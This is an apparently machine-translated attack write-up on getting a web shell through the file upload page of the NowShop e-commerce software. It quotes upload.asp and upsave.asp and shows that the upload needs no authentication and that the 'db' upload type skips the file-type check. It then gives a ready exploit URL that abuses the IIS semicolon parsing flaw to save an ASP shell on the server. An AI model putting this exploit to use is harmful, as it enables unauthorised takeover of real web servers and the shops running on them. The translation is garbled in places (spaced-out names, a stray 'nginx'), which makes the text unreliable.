Direct upload of NowShop to get SHELL

The vulnerability lies in the upload. asp page.
No verification
<! -- # Include file = "../include/nowshop. asp" -->
<%
Session ("fuptype") = request ("fuptype ")
Session ("fupname") = request ("fupname ")
Session ("frmname") = request ("frmname ")
Server. ScriptTimeOut = 99999
%>
<Html>
<Head>
<Title> File Upload </title>
<Meta name = "Description" Content = "">
<LINK href = "../images/css.css" type = text/css rel = stylesheet>
<LINK href = "../list/newhead.css" type = text/css rel = stylesheet>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312"> <Body bgcolor = "# D9EAFC">
<Table align = "left"> <tr> <td>
<Form name = "form1" method = "post" action = "upsave. asp" enctype = "multipart/form-data"> // or the called upsave. asp
<B> select the file to be uploaded: </B> <br>
<Input type = file name = "file1">
<Input type = submit name = "submit" value = "Upload"> <br>
,,,,,,,,,
</Html>

We can see that upsave. asp is not verified yet, but some versions have file restrictions added, but it is perfect to work with iis.
If file. fileSize> 0 then
Filename = fupname + "." // This location
Filenameend = file. filename
Filenameend = split (filenameend ,".")
N = UBound (filenameend)
Filename = filename & filenameend (n)
If fuptype <> "db" then
If file. fileSize> 200000 then
Response. write "<script language = javascript>"
Response. write "alert (the file you uploaded is too large and cannot be uploaded successfully. The maximum size of a single file cannot exceed 200 KB !); "
Response. write "location. href = javascript: history. go (-1 );"
Response. write "</script>"
Response. end
End if
End if
If fuptype = "adv" or fuptype = "pic" then
If LCase (filenameend (n) <> "gif" and LCase (filenameend (n) <> "jpg" and LCase (filenameend (n )) <> "swf" and LCase (filenameend (n) <> "htm" then
Response. write "<script language = javascript>"
Response. write "alert (the file format you selected cannot be uploaded. Please check and upload again !); "
Response. write "location. href = javascript: history. go (-1 );"
Response. write "</script>"
Response. end
End if
End if
If fuptype = "adv" then
Savepath = "../images/adv/" & filename
Elseif fuptype = "pic" then
Savepath = "../pic/digi/" & filename
Elseif fuptype = "pic1" then
Savepath = "../pic/digi1/" & filename
Elseif fuptype = "link" then
Savepath = "../images/links/" & filename
Elseif fuptype = "db" then
Savepath = "./" & filename
The following vulnerability exploitation page
Http: // 127.0.0.1/admin/upload. asp? Fuptype = db & fupname = Ach. asp;. asp & frmname = Ach. asp
In this example, the nginx. asp and. asp vulnerabilities use the iis Parsing Vulnerability.